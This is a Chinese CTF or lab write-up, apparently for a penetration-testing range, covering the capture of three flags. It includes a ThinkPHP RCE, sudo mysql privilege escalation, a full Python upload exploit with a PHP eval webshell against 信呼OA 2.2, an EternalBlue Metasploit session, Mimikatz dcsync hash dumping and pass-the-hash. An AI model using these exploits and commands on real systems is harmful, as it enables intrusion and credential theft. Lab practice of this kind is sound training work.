flag1:
fscan扫一下,发现有thinkphp的洞

thinkphp-rce
thinkphpGUI嗦一下,发现是ThinkPHP 5.0.23 RCE

蚁剑连接,找到flag的位置,但是权限不够

检验一下,发现是www-data权限,然后sudo -l看一下可以用sudo执行的命令
1 2
| User www-data may run the following commands on ubuntu-web01: (root) NOPASSWD: /usr/bin/mysql
|

sudo提权-mysql
可以用数据库执行命令sudo mysql -e '\!'拿到第一段flag

ifconfig发现内网网段为172.22.1.*,然后上传fscan去扫内网(记得要给fscan可执行权限)
flag2:
先来整理一下
1 2 3 4
| MS17-010 172.22.1.21 http://172.22.1.18?m=login 信呼协同办公系统 http://172.22.1.15 poc-yaml-thinkphp5023-method-rce poc1 已穿 172.22.1.2 [+] DC:DC01.xiaorang.lab
|
搭建内网代理:
为了访问到内网,我们要先搭建内网代理,此处用stowaway搭建,并且socket监听一个端口

然后用proxifier连接代理,注意修改rule里的target_hosts

连接完成后,即可访问

这里是弱口令admin123
信呼OA2.2-RCE
查询漏洞发现信呼2.2版本是存在文件上传漏洞的,首页通知中也有说明版本为2.2

找了篇文章来打:[代码审计]信呼协同办公系统2.2存在文件上传配合云处理函数组合拳RCE_信呼协同办公系统弱口令-CSDN博客
1.php:记得改为POST
1
| <?php eval($_POST["1"]);?>
|
exp.py:修改URL和adminuser及adminpass
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33
| import requests session = requests.session() url_pre = 'http://172.22.1.18/' url1 = url_pre + '?a=check&m=login&d=&ajaxbool=true&rnd=533953' url2 = url_pre + '/index.php?a=upfile&m=upload&d=public&maxsize=100&ajaxbool=true&rnd=798913' url3 = url_pre + '/task.php?m=qcloudCos|runt&a=run&fileid=11' data1 = { 'rempass': '0', 'jmpass': 'false', 'device': '1625884034525', 'ltype': '0', 'adminuser': 'YWRtaW4=', 'adminpass': 'YWRtaW4xMjM=', 'yanzm': '' } r = session.post(url1, data=data1) r = session.post(url2, files={'file': open('1.php', 'r+')}) filepath = str(r.json()['filepath']) filepath = "/" + filepath.split('.uptemp')[0] + '.php' id = r.json()['id'] url3 = url_pre + f'/task.php?m=qcloudCos|runt&a=run&fileid={id}' r = session.get(url3) r = session.get(url_pre + filepath + "?1=system('dir');") print(r.text)
|
由于此时本机已经用proxifier连接了代理,所以本地直接运行也是可以的
我这里在kali里运行,先配置proxychains,写入socket5 vps地址
1
| proxychains python exp.py
|

此时访问发现存在:

直接蚁剑连接即可,找到第二段flag

flag3:
再来回顾一下:
1 2 3 4
| MS17-010 172.22.1.21 http://172.22.1.18?m=login 信呼协同办公系统 已穿 http://172.22.1.15poc-yaml-thinkphp5023-method-rce poc1 已穿 172.22.1.2 [+] DC:DC01.xiaorang.lab
|
那么接下来对172.22.1.21下手,MS17-010即永恒之蓝,可以直接用msf一把梭(我用的kali的)
1 2 3 4 5
| proxychains msfconsole use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/bind_tcp_uuid set RHOSTS 172.22.1.21 run
|

此时就是一个系统权限

然后就要尝试抓取用户的哈希进行PTH
dcsync
先用load kiwi加载Mimikatz
然后在获取权限的域成员主机上执行kiwi_cmd lsadump::dcsync /domain:xiaorang.lab /all /csv

得到Administrator的哈希:10cf89a850fb1cdbe6bb432b859164c8
PTH
进行哈希传递

发现传递成功,接下来即可执行命令拿flag了
